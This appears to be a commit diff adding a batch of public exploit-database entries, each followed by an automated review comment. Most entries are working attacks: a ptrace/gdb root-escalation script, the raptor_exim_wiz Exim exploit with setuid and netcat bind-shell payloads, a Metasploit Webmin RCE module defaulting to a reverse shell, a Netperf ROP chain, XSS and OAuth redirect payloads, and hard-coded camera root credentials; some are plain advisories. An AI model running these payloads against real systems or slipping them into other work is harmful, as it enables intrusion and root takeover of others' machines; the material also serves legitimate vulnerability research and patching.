Commit 73bcc520 authored by Devon Kearns

New upstream version 20190618

parent 68d1624a
# Exploit Title: Sitecore v 8.x Deserialization RCE
# Date: Reported to vendor October 2018, fix released April 2019.
# Exploit Author: Jarad Kopf
# Vendor Homepage: https://www.sitecore.com/
# Software Link: Sitecore downloads: https://dev.sitecore.net/Downloads.aspx
# Version: Sitecore 8.0 Revision 150802
# Tested on: Windows
# CVE : CVE-2019-11080
Exploit:
Authentication is needed for this exploit. An attacker needs to login to Sitecore 8.0 revision 150802's Admin section.
When choosing to Serializeusers or domains in the admin UI, calls to /sitecore/shell/~/xaml/Sitecore.Shell.Applications.Dialogs.Progress.aspx will include a CSRFTOKEN parameter.
By replacing this parameter with a URL-encoded, base64-encoded crafted payload from ysoserial.net, an RCE is successful.
\ No newline at end of file
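Review bot: The header names the affected build (Sitecore 8.0 Revision 150802) and says a fix was released in April 2019, but nowhere states the fixed version or a vendor advisory reference, so a reader triaging CVE-2019-11080 cannot tell from this file what to upgrade to; add a reference line for the vendor fix. The title says "v 8.x" while the Version field lists a single revision, so state whether other 8.x revisions were tested. Minor: "Serializeusers" in the description is missing a space, and the file has no trailing newline.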
1. Advisory Information
========================================
Title: Clever Dog Smart Camera
Vendor Homepage: http://www.cleverdog.com.cn/
Tested on Camera types : DOG-2W, DOG-2W-V4
Vulnerability: Hardware- Multiple Vulnerabilities
Date: 14/06/2019
Author: Alex Akinbi Twitter: @alexakinbi
1. Unauthenticated file disclosure:
========================================
An attacker on the local network has unauthenticated access to the internal SD card via HTTP service on port 8000. The HTTP web server on the camera allows an attacker to download video archive recorded and saved on the external memory card attached.
For example: http://192.168.1.81:8000/20190606
2. Telnet Backdoor using default credentials:
========================================
An attacker on the network can login remotely to the camera and gain root access. The device ships with hard-coded credentials, accessible from a telnet login prompt using credentials username: " root" and password: "12345678". These credentials work on all devices.
3. Login password sent over network unencrypted using Clever Dog App:
========================================
Using a packet sniffer, an attacker on the same network can capture data packets and view
captured user login password MD5 hash. A weak password can be cracked and used to login to the user account.
4. SOLUTION
========================================
Contact the vendor for further information regarding the proper mitigation of this vulnerability.
\ No newline at end of file
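Review bot: Section numbering restarts: "1. Advisory Information" is followed by "1. Unauthenticated file disclosure", so the findings and "4. SOLUTION" do not number consistently; renumber or drop the number from the advisory header. The file-disclosure paragraph calls the storage an "internal SD card" and then an "external memory card", and the telnet username is quoted as " root" with a leading space; both should be corrected so the findings can be verified. The advisory lists camera types but no firmware version and no CVE, which makes it hard to track whether a later firmware removes the hard-coded credentials.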
# Exploit Title: Open Redirector in spring-security-oauth2
# Date: 17 June 2019
# Exploit Author: Riemann
# Vendor Homepage: https://spring.io/projects/spring-security-oauth
# Software Link: https://spring.io
# Version: Spring Security OAuth versions 2.3 prior to 2.3.6 -org.springframework.security.oauth:spring-security-oauth2:2.3.3.RELEASE
# Tested on: UBUNTU 16.04 LTS -org.springframework.security.oauth:spring-security-oauth2:2.3.3.RELEASE
# CVE : CVE-2019-11269 | CVE-2019-3778
# Description
Spring Security OAuth versions 2.3 prior to 2.3.6, 2.2 prior to 2.2.5, 2.1 prior to 2.1.5, and 2.0 prior to 2.0.18, as well as older unsupported versions could be susceptible to an open redirector attack that can leak an authorization code. A malicious user or attacker can craft a request to the authorization endpoint using the authorization code grant type, and specify a manipulated redirection URI via the redirect_uri parameter. This can cause the authorization server to redirect the resource owner user-agent to a URI under the control of the attacker with the leaked authorization code.
#VULNERABILITY:
By manipulating the REDIRECT_URI parameter, an attacker can actually bypass the validation.
The code causing the vulnerability is found under the package org.springframework.security.oauth2.provider.endpoint
The Class: DefaultRedirectResolver, which method obtainMatchingRedirect does not proper sanitation
/**
* Attempt to match one of the registered URIs to the that of the requested one.
*
* @param redirectUris the set of the registered URIs to try and find a match. This cannot be null or empty.
* @param requestedRedirect the URI used as part of the request
* @return the matching URI
* @throws RedirectMismatchException if no match was found
*/
private String obtainMatchingRedirect(Set<String> redirectUris, String requestedRedirect) {
Assert.notEmpty(redirectUris, "Redirect URIs cannot be empty");
if (redirectUris.size() == 1 && requestedRedirect == null) {
return redirectUris.iterator().next();
}
for (String redirectUri : redirectUris) {
if (requestedRedirect != null && redirectMatches(requestedRedirect, redirectUri)) {
return requestedRedirect;
}
}
throw new RedirectMismatchException("Invalid redirect: " + requestedRedirect
+ " does not match one of the registered values: " + redirectUris.toString());
}
#POC ATTACK VECTOR
The following request done by the CLIENT APP after the user has logged in, contains the REDIRECT_URI parameter. The validation is bypassed by simply adding a percentage sign which triggers a redirect instead of the RedirectMismatchException error
The ORIGINAL REQUEST containing a valid URI:
GET /auth/oauth/authorize?response_type=code&client_id=R2dpxQ3vPrtfgF72&scope=user_info&state=HPRbfRgJLWdmLMi9KXeLJDesMLfPC3vZ0viEkeIvGuQ%3D&redirect_uri=http://localhost:8086/login/oauth2/code/ HTTP/1.1
The attacker then tricks the application by changing entirely the URI to another server adding a percentage for example:
GET /auth/oauth/authorize?response_type=code&client_id=R2dpxQ3vPrtfgF72&scope=user_info&state=HPRbfRgJLWdmLMi9KXeLJDesMLfPC3vZ0viEkeIvGuQ%3D&redirect_uri=http://%localhost:9000/login/oauth2/code/ HTTP/1.1
Host: localhost:8085
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8085/auth/login
Connection: close
Cookie: JSESSIONID=3394FD89204BE407CB585881755C0828; JSESSIONID=C0F1D5A2F1944DCB43F2BFFA416B7A63
Upgrade-Insecure-Requests: 1
The RESPONSE indeed does not produce an expected OAUTH error but redirects the user :
HTTP/1.1 302
Cache-Control: no-store
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
Location: http://localhost:8086/login/oauth2/code/?code=4ecsea&state=HPRbfRgJLWdmLMi9KXeLJDesMLfPC3vZ0viEkeIvGuQ%3D
Content-Language: en-US
Content-Length: 0
Date: Mon, 17 Jun 2019 11:06:18 GMT
Connection: close
\ No newline at end of file
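Review bot: The PoC request and the response shown do not match: the modified request sets redirect_uri=http://%localhost:9000/login/oauth2/code/, but the Location header in the response is http://localhost:8086/login/oauth2/code/, which is the URI from the original request. As written, the capture does not show the authorization code going to a different host; include the response that belongs to the modified request or explain the discrepancy. The header also lists two CVEs (CVE-2019-11269 | CVE-2019-3778) without saying which one this request pattern corresponds to, and the captured JSESSIONID cookie values should be redacted before archiving.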
# Exploit Title: Liferay Portal < 7.1 CE GA4 / SimpleCaptcha API XSS
# Date: 04/06/2019
# Exploit Author: Valerio Brussani (@val_brux)
# Website: www.valbrux.it
# Vendor Homepage: https://www.liferay.com/
# Software Link: https://www.liferay.com/it/downloads-community
# Version: < 7.1 CE GA4
# Tested on: Liferay Portal 7.1 CE GA3
# CVE: CVE-2019-6588
# Reference1: https://dev.liferay.com/web/community-security-team/known-vulnerabilities/liferay-portal-71/-/asset_publisher/7v4O7y85hZMo/content/cst-7130-multiple-xss-vulnerabilities-in-7-1-ce-ga3
# Reference2: https://www.valbrux.it/blog/2019/06/04/cve-2019-6588-liferay-portal-7-1-ce-ga4-simplecaptcha-api-xss/
Introduction
In Liferay Portal before 7.1 CE GA4, an XSS vulnerability exists in the SimpleCaptcha API when custom code passes unsanitized input
into the “url” parameter of the JSP taglib call <liferay-ui:captcha url=”<%= url %>” /> or <liferay-captcha:captcha url=”<%= url %>” />.
A customized Liferay portlet which directly calls the Simple Captcha API without sanitizing the input could be susceptible to this vulnerability.
Poc
In a sample scenario of custom code calling the <liferay-ui:captcha url=”<%= url %>” /> JSP taglib, appending a payload like the following to the body parameters of a customized form:
&xxxx%22%3e%3cscript%3ealert(1)</script>
The script is reflected in the src attribute of the <img> tag, responsible of fetching the next available captcha:
<img alt=”xxx” class=”xxxx” src=”xxxxxx“><script>alert(1)</script>=” />
\ No newline at end of file
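Review bot: The JSP taglib examples and the reflected <img> sample use typographic quotes (” and “) instead of ASCII double quotes, so the markup in this file is not what a developer would see in source or in the response; replace them with plain quotes. The sample payload mixes URL-encoded characters (%22%3e%3cscript%3e) with a raw closing </script>, so say whether it is shown as sent or as decoded. Since the issue arises when custom code passes unsanitized input into the url attribute, a line stating the remediation (upgrade to 7.1 CE GA4, and encode the value before passing it to the taglib) would make the entry actionable.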
# Exploit Author: Juan Sacco <jsacco@exploitpack.com> - http://exploitpack.com
#
# Tested on: Kali i686 GNU/Linux
#
# Description: Netperf 2.6.0 s a benchmark tool than developed by Helett Packard that can be used to measure the performance of many different types of networking.
# It provides tests for both unidirectional troughput and end-to-end latency.
#
# Vendor: https://hewlettpackard.github.io/netperf/
#
# Program received signal SIGSEGV, Segmentation fault.
# 0x41424344 in ?? ()
# LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
# EAX 0x6d
# EBX 0x41414141 ('AAAA')
# ECX 0x6f
# EDX 0x430320 (test_name) 'TCP_STREAM'
# EDI 0xb7ea2000 (_GLOBAL_OFFSET_TABLE_)
# ESI 0xbfffd2c0 0x3
# EBP 0x41414141 ('AAAA')
# ESP 0xbfffd280 0x0
# EIP 0x41424344 ('DCBA')
# Invalid address 0x41424344
# Program received signal SIGSEGV (fault address 0x41424344)
# PoC: run -a `python -c 'print "A"*8220+"DCBA"'`
from struct import pack
# int mprotect(void *addr, size_t len, int prot);
# define PROT_READ 0x1
# define PROT_WRITE 0x2
# define PROT_EXEC 0x4
#
# gef p mprotect
# $1 = {<text variable, no debug info>} 0xb7dbdfd0 <mprotect>
# gef p read
#{ssize_t (int, void *, size_t)} 0xb7db06b0 <__GI___libc_read>
#
# gef ropgadget
#pop3ret = 0x402fea
offset = 8220
mprotect = 0xb7dbdfd0 # <mprotect>
read = 0xb7db06b0 # <read>
pop3ret = 0x402fea
target_memory = 0xb7fd4000 # r-xp [vdso]
rop_chain = 'A' * offset
rop_chain += pack('I', mprotect) # mprotect
rop_chain += pack('I', pop3ret) # gadget
rop_chain += pack('I', 0xbffdf000) # arg - void*
rop_chain += pack('I', 0x100000) # arg size_t
rop_chain += pack('I',0x7) # arg int
rop_chain += pack('I', read)
rop_chain += pack('I', 0xbffdf000) # return stack
rop_chain += pack('I',0x00) # arg int fd
rop_chain += pack('I',0xbffdf000) # arg void
rop_chain += pack('I',0x200) # arg size_t
print rop_chain
\ No newline at end of file
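Review bot: This entry has none of the header fields the other files in this commit carry (Exploit Title, Date, Version, CVE), and the affected version appears only inside the description ("Netperf 2.6.0"); add the standard header so the entry can be indexed and matched to a fix. target_memory = 0xb7fd4000 is assigned but never used, while the chain hard-codes 0xbffdf000 three times; remove the dead variable or name the constant. The description has typos ("Helett Packard", "troughput", "s a benchmark tool than developed").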
......@@ -2,7 +2,7 @@
#
# Exploit Title: Vesta Control Panel 0.9.7 <= 0.9.8-16 Local Privilege Escalation Exploit
# Google Dork: vesta control panel inurl:8083
# Exploit Author: Luka Pusic @lukapusic, Jaka Hudoklin @offlinehacker
# Exploit Author: Luka Pusic, Jaka Hudoklin @offlinehacker
# Vendor Homepage: http://vestacp.com/
# Software Link: https://github.com/serghey-rodin/vesta
# Version: 0.9.7 - 0.9.8-16
......
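Review bot: The two "Exploit Author" lines in this hunk differ only in the @lukapusic handle, which is dropped for Luka Pusic while Jaka Hudoklin keeps @offlinehacker. The commit message ("New upstream version 20190618") gives no reason for the attribution change; confirm it is an upstream request and not an accidental edit, and keep the handle style consistent between the two authors.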
#!/usr/bin/env bash
#######################################################
# #
# 'ptrace_scope' misconfiguration #
# Local Privilege Escalation #
# #
#######################################################
# Affected operating systems (TESTED):
# Parrot Home/Workstation 4.6 (Latest Version)
# Parrot Security 4.6 (Latest Version)
# CentOS / RedHat 7.6 (Latest Version)
# Kali Linux 2018.4 (Latest Version)
# Authors: Marcelo Vazquez (s4vitar)
# Victor Lasa (vowkin)
#┌─[s4vitar@parrot]─[~/Desktop/Exploit/Privesc]
#└──╼ $./exploit.sh
#
#[*] Checking if 'ptrace_scope' is set to 0... [√]
#[*] Checking if 'GDB' is installed... [√]
#[*] System seems vulnerable! [√]
#
#[*] Starting attack...
#[*] PID -> sh
#[*] Path 824: /home/s4vitar
#[*] PID -> bash
#[*] Path 832: /home/s4vitar/Desktop/Exploit/Privesc
#[*] PID -> sh
#[*] Path
#[*] PID -> sh
#[*] Path
#[*] PID -> sh
#[*] Path
#[*] PID -> sh
#[*] Path
#[*] PID -> bash
#[*] Path 1816: /home/s4vitar/Desktop/Exploit/Privesc
#[*] PID -> bash
#[*] Path 1842: /home/s4vitar
#[*] PID -> bash
#[*] Path 1852: /home/s4vitar/Desktop/Exploit/Privesc
#[*] PID -> bash
#[*] Path 1857: /home/s4vitar/Desktop/Exploit/Privesc
#
#[*] Cleaning up... [√]
#[*] Spawning root shell... [√]
#
#bash-4.4# whoami
#root
#bash-4.4# id
#uid=1000(s4vitar) gid=1000(s4vitar) euid=0(root) egid=0(root) grupos=0(root),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(debian-tor),124(bluetooth),136(scanner),1000(s4vitar)
#bash-4.4#
function startAttack(){
tput civis && pgrep "^(echo $(cat /etc/shells | tr '/' ' ' | awk 'NF{print $NF}' | tr '\n' '|'))$" -u "$(id -u)" | sed '$ d' | while read shell_pid; do
if [ $(cat /proc/$shell_pid/comm 2>/dev/null) ] || [ $(pwdx $shell_pid 2>/dev/null) ]; then
echo "[*] PID -> "$(cat "/proc/$shell_pid/comm" 2>/dev/null)
echo "[*] Path $(pwdx $shell_pid 2>/dev/null)"
fi; echo 'call system("echo | sudo -S cp /bin/bash /tmp >/dev/null 2>&1 && echo | sudo -S chmod +s /tmp/bash >/dev/null 2>&1")' | gdb -q -n -p "$shell_pid" >/dev/null 2>&1
done
if [ -f /tmp/bash ]; then
/tmp/bash -p -c 'echo -ne "\n[*] Cleaning up..."
rm /tmp/bash
echo -e " [√]"
echo -ne "[*] Spawning root shell..."
echo -e " [√]\n"
tput cnorm && bash -p'
else
echo -e "\n[*] Could not copy SUID to /tmp/bash [✗]"
fi
}
echo -ne "[*] Checking if 'ptrace_scope' is set to 0..."
if grep -q "0" < /proc/sys/kernel/yama/ptrace_scope; then
echo " [√]"
echo -ne "[*] Checking if 'GDB' is installed..."
if command -v gdb >/dev/null 2>&1; then
echo -e " [√]"
echo -e "[*] System seems vulnerable! [√]\n"
echo -e "[*] Starting attack..."
startAttack
else
echo " [✗]"
echo "[*] System is NOT vulnerable :( [✗]"
fi
else
echo " [✗]"
echo "[*] System is NOT vulnerable :( [✗]"
fi; tput cnorm
\ No newline at end of file
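Review bot: The header calls this a 'ptrace_scope' misconfiguration but never states the precondition the script relies on or the setting that closes it. The script only proceeds when /proc/sys/kernel/yama/ptrace_scope reads 0 and gdb is installed, and the injected command uses sudo -S with an empty password, so it depends on another shell of the same user holding a cached sudo credential. Document that in the header, along with the mitigation of setting kernel.yama.ptrace_scope to 1 or higher. The sample output is also from a Spanish-locale system ("grupos="), which is worth noting for readers comparing results.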
#!/bin/bash
#
# raptor_exim_wiz - "The Return of the WIZard" LPE exploit
# Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# A flaw was found in Exim versions 4.87 to 4.91 (inclusive).
# Improper validation of recipient address in deliver_message()
# function in /src/deliver.c may lead to remote command execution.
# (CVE-2019-10149)
#
# This is a local privilege escalation exploit for "The Return
# of the WIZard" vulnerability reported by the Qualys Security
# Advisory team.
#
# Credits:
# Qualys Security Advisory team (kudos for your amazing research!)
# Dennis 'dhn' Herrmann (/dev/tcp technique)
#
# Usage (setuid method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m setuid
# Preparing setuid shell helper...
# Delivering setuid payload...
# [...]
# Waiting 5 seconds...
# -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned
# # id
# uid=0(root) gid=0(root) groups=0(root)
#
# Usage (netcat method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m netcat
# Delivering netcat payload...
# Waiting 5 seconds...
# localhost [127.0.0.1] 31337 (?) open
# id
# uid=0(root) gid=0(root) groups=0(root)
#
# Vulnerable platforms:
# Exim 4.87 - 4.91
#
# Tested against:
# Exim 4.89 on Debian GNU/Linux 9 (stretch) [exim-4.89.tar.xz]
#
METHOD="setuid" # default method
PAYLOAD_SETUID='${run{\x2fbin\x2fsh\t-c\t\x22chown\troot\t\x2ftmp\x2fpwned\x3bchmod\t4755\t\x2ftmp\x2fpwned\x22}}@localhost'
PAYLOAD_NETCAT='${run{\x2fbin\x2fsh\t-c\t\x22nc\t-lp\t31337\t-e\t\x2fbin\x2fsh\x22}}@localhost'
# usage instructions
function usage()
{
echo "$0 [-m METHOD]"
echo
echo "-m setuid : use the setuid payload (default)"
echo "-m netcat : use the netcat payload"
echo
exit 1
}
# payload delivery
function exploit()
{
# connect to localhost:25
exec 3<>/dev/tcp/localhost/25
# deliver the payload
read -u 3 && echo $REPLY
echo "helo localhost" >&3
read -u 3 && echo $REPLY
echo "mail from:<>" >&3
read -u 3 && echo $REPLY
echo "rcpt to:<$PAYLOAD>" >&3
read -u 3 && echo $REPLY
echo "data" >&3
read -u 3 && echo $REPLY
for i in {1..31}
do
echo "Received: $i" >&3
done
echo "." >&3
read -u 3 && echo $REPLY
echo "quit" >&3
read -u 3 && echo $REPLY
}
# print banner
echo
echo 'raptor_exim_wiz - "The Return of the WIZard" LPE exploit'
echo 'Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>'
echo
# parse command line
while [ ! -z "$1" ]; do
case $1 in
-m) shift; METHOD="$1"; shift;;
* ) usage
;;
esac
done
if [ -z $METHOD ]; then
usage
fi
# setuid method
if [ $METHOD = "setuid" ]; then
# prepare a setuid shell helper to circumvent bash checks
echo "Preparing setuid shell helper..."
echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" >/tmp/pwned.c
gcc -o /tmp/pwned /tmp/pwned.c 2>/dev/null
if [ $? -ne 0 ]; then
echo "Problems compiling setuid shell helper, check your gcc."
echo "Falling back to the /bin/sh method."
cp /bin/sh /tmp/pwned
fi
echo
# select and deliver the payload
echo "Delivering $METHOD payload..."
PAYLOAD=$PAYLOAD_SETUID
exploit
echo
# wait for the magic to happen and spawn our shell
echo "Waiting 5 seconds..."
sleep 5
ls -l /tmp/pwned
/tmp/pwned
# netcat method
elif [ $METHOD = "netcat" ]; then
# select and deliver the payload
echo "Delivering $METHOD payload..."
PAYLOAD=$PAYLOAD_NETCAT
exploit
echo
# wait for the magic to happen and spawn our shell
echo "Waiting 5 seconds..."
sleep 5
nc -v 127.0.0.1 31337
# print help
else
usage
fi
\ No newline at end of file
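Review bot: The setuid path leaves /tmp/pwned.c and a mode 4755 root-owned /tmp/pwned on the host after the run (the sample output shows "-rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned"), and nothing in the script or header tells the tester to remove them; add a cleanup note so test systems are not left with a setuid-root shell. The header gives the vulnerable range (Exim 4.87 - 4.91) but does not name the fixed release. Style: [ -z $METHOD ] and [ $METHOD = "setuid" ] use unquoted expansions, which break the test when -m is given a value containing spaces; quote "$METHOD".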
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Webmin <= 1.910 - "Package Updates" Remote Command Execution',
'Description' => %q(
This module exploits an arbitrary command execution vulnerability in Webmin
1.910 and lower versions. Any user authorized to the "Package Updates"
module can execute arbitrary commands with root privileges.
),
'Author' => [
'AkkuS <Özkan Mustafa Akkuş>' # Vulnerability Discovery, MSF PoC module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2019-'],
['URL', 'https://www.pentest.com.tr/exploits/Webmin-1910-Package-Updates-Remote-Command-Execution.html']
],
'Privileged' => true,
'Payload' =>
{
'DisableNops' => true,
'Space' => 512,
'Compat' =>
{
'PayloadType' => 'cmd'
}
},
'DefaultOptions' =>
{
'RPORT' => 10000,
'SSL' => false,
'PAYLOAD' => 'cmd/unix/reverse_python' # its depends
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' => [['Webmin <= 1.910', {}]],
'DisclosureDate' => 'May 16 2019',
'DefaultTarget' => 0)
)
register_options [
OptString.new('USERNAME', [true, 'Webmin Username']),
OptString.new('PASSWORD', [true, 'Webmin Password']),
OptString.new('TARGETURI', [true, 'Base path for Webmin application', '/'])
]
end
def peer
"#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
end
def login
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri, 'session_login.cgi'),
'cookie' => 'testing=1',
'vars_post' => {
'page' => '',
'user' => datastore['USERNAME'],
'pass' => datastore['PASSWORD']
}
})
if res && res.code == 302 && res.get_cookies =~ /sid=(\w+)/
return $1
end
return nil unless res
''
end
##
# Target and input verification
##
def check
cookie = login
return CheckCode::Detected if cookie == ''
return CheckCode::Unknown if cookie.nil?
vprint_status('Attempting to execute...')
# check package update priv
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, "package-updates/"),
'cookie' => "sid=#{cookie}"
})
if res && res.code == 200 && res.body =~ /Software Package Update/
print_status("NICE! #{datastore['USERNAME']} has the right to >>Package Update<<")
return CheckCode::Vulnerable
end
print_error("#{datastore['USERNAME']} has not the right to >>Package Update<<")
print_status("Please try with another user account!")
CheckCode::Safe
end
##
# Exploiting phase
##
def exploit
cookie = login
if cookie == '' || cookie.nil?
fail_with(Failure::Unknown, 'Failed to retrieve session cookie')
end
print_good("Session cookie: #{cookie}")
res = send_request_raw(
'method' => 'POST',
'uri' => normalize_uri(target_uri, 'proc', 'index_tree.cgi'),
'headers' =>
{
'Referer' => "#{peer}/sysinfo.cgi?xnavigation=1"
},
'cookie' => "redirect=1; testing=1; sid=#{cookie}"
)
unless res && res.code == 200
fail_with(Failure::Unknown, 'Request failed')
end
print_status("Attempting to execute the payload...")
exec(cookie)
end
def exec(cookie)
command = payload.encoded
res = send_request_cgi(
{
'method' => 'POST',
'cookie' => "sid=#{cookie}",
'ctype' => 'application/x-www-form-urlencoded',
'uri' => normalize_uri(target_uri.path, 'package-updates', 'update.cgi'),
'headers' =>
{
'Referer' => "#{peer}/package-updates/?xnavigation=1"
},
'data' => "u=acl%2Fapt&u=%20%7C%20#{command}&ok_top=Update+Selected+Packages"
})
end
end
##
# The end of the adventure (o_O) // AkkuS
##
\ No newline at end of file
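Review bot: The References entry ['CVE', '2019-'] is an incomplete identifier and will produce a broken CVE reference in the module info; either fill in the assigned CVE or remove the entry until one exists. login and exploit build their URIs with normalize_uri(target_uri, ...) while check and exec use target_uri.path, so use .path consistently. The method named exec shadows Kernel#exec inside the module; a more specific name would avoid confusion. The comment "# its depends" on the default PAYLOAD does not say what it depends on.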
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
X41 D-Sec GmbH Security Advisory: X41-2019-004
Type confusion in Thunderbird
=============================
Severity Rating: Medium
Confirmed Affected Versions: All versions affected
Confirmed Patched Versions: Thunderbird ESR 60.7.XXX
Vendor: Thunderbird
Vendor URL: https://www.thunderbird.net/
Vendor Reference: https://bugzilla.mozilla.org/show_bug.cgi?id=1555646
Vector: Incoming mail with calendar attachment
Credit: X41 D-SEC GmbH, Luis Merino
Status: Public
CVE: CVE-2019-11706
CWE: 843
CVSS Score: 6.5
CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O
Advisory-URL:
https://www.x41-dsec.de/lab/advisories/x41-2019-004-thunderbird
Summary and Impact
==================
A type confusion has been identified in the Thunderbird email
client. The issue is present in the libical implementation, which was
forked from upstream libical version 0.47.
The issue can be triggered remotely, when an attacker sends an specially
crafted calendar attachment and does not require user interaction. It
might be used by a remote attacker to crash the process or leak
information from the client system via calendar replies.
X41 did not perform a full test or audit on the software.
Product Description
===================
Thunderbird is a free and open source email, newsfeed, chat, and
calendaring client, that's easy to set up and customize.
Analysis
========
A type confusion in icalproperty.c
icaltimezone_get_vtimezone_properties() can be triggered while parsing a
malformed calendar attachment. Missing sanity checks allows a TZID
property to be parsed as ICALFLOATVALUE but it is later used as a
string.
The bug manifests with strdup(tzid); being called with tzid containing
a bad pointer obtained by casting to char* from a float value, which
typically means segfaulting by dereferencing a non-mapped memory page.
An attacker might be able to deliver an input file containing specially
crafted float values as TZID properties which could point to arbitrary
memory positions.
Certain conditions could allow to exfiltrate information via a calendar
reply or other undetermined impact.
Proof of Concept
================
A reproducer eml file can be found in
https://github.com/x41sec/advisories/tree/master/X41-2019-004
Workarounds
===========
A fix is available from upstream. Alternatively, libical can be replaced
by icaljs, a JavaScript implementation of ical parsing, by setting
calendar.icaljs = true in Thunderbird configuration.
Timeline
========
2019-05-30 Issues reported to the vendor
2019-06-07 Vendor reply
2019-06-12 CVE IDs assigned
2019-06-13 Patched Version released
2019-06-13 Advisory released
About X41 D-SEC GmbH
====================
X41 is an expert provider for application security services.
Having extensive industry experience and expertise in the area of
information security, a strong core security team of world class
security experts enables X41 to perform premium security services.
Fields of expertise in the area of application security are security
centered code reviews, binary reverse engineering and vulnerability
discovery.
Custom research and a IT security consulting and support services are
core competencies of X41.
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEEpwxVTgxAIcUvTugIo5Klpg50CxAFAl0CtO0ACgkQo5Klpg50
CxCkuA/+L513gnHCf0hOFGuFsGaEX6dPSmJi1g2Wom28cXJw7dEd6/qU4k5H64cI
yRDQR7vVt7+xUTlPIh8sguaPjB7xOlw+3pHpLo5+pfIuUuK/gK4Wm8ZF1Qv4okBs
e046d2Nd+UAX/WbEXLt4UHOowgVEJWHfq54WkKHNTseWpeww/sBNdv1qlliiUCWa
qnFMzA7rbgtOJl/LxS9xDOp5PufD3inR/Apvh49P8IhDj6L7+02fxGt0WdwA/8vF
TiI2V4bHEYrLmsUptSHSj10HKfMlEqKgWWQCunTGvUZvWWYHS6cS6a9EbHuWWyNY
8BNj045D0Gw0xL1697erebeIxOZ33+QdEp1NopVzpJkeZBZtx/XYPY3PnQ+HMRjr
4LwsjdDBeaMVgiUIZ2EZ08779MBYPNB+6p0byaWgyTbyHk0GRVxqRNwkU/8xS0f4
M9NUt75T7FjqU8VX/KyZsmXs+/8tauh0T3J9CYoQ73r/WoRxB0xeJCEJueRegctu
gSnIf+KApkmE+2WRc8CrPSZx42XhTjcoEgbcYSxGebEitd+bGz2j2gjwqxDGC8nr
QK30hr/lOaC0y6nblfCygx+G6hZH1dc2+fi6ZboWZRqRTtB2zIM+SulMj+QjtHCm
UMPFQeB8stxBfIAxLu8DojBq4YWP8N2wQ5MyAW3/TzTd+JO1Wbk=
=Hy9J
-----END PGP SIGNATURE-----
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47001.zip
\ No newline at end of file
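Review bot: "Confirmed Patched Versions: Thunderbird ESR 60.7.XXX" is a placeholder, so the advisory as archived does not tell a reader which release carries the fix even though the timeline records "2019-06-13 Patched Version released"; replace it with the actual version. The two "Proof of Concept:" lines after -----END PGP SIGNATURE----- were appended outside the signed body, so they are not covered by X41's signature and point to a different location than the reproducer URL in the signed text; mark them as added by the archive. The Analysis paragraph names "icalproperty.c icaltimezone_get_vtimezone_properties()" without separating file and function.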
X41 D-Sec GmbH Security Advisory: X41-2019-001
Heap-based buffer overflow in Thunderbird
=========================================
Severity Rating: High
Confirmed Affected Versions: All versions affected
Confirmed Patched Versions: Thunderbird ESR 60.7.XXX
Vendor: Thunderbird
Vendor URL: https://www.thunderbird.net/
Vendor Reference: https://bugzilla.mozilla.org/show_bug.cgi?id=1553814
Vector: Incoming mail with calendar attachment
Credit: X41 D-SEC GmbH, Luis Merino
Status: Public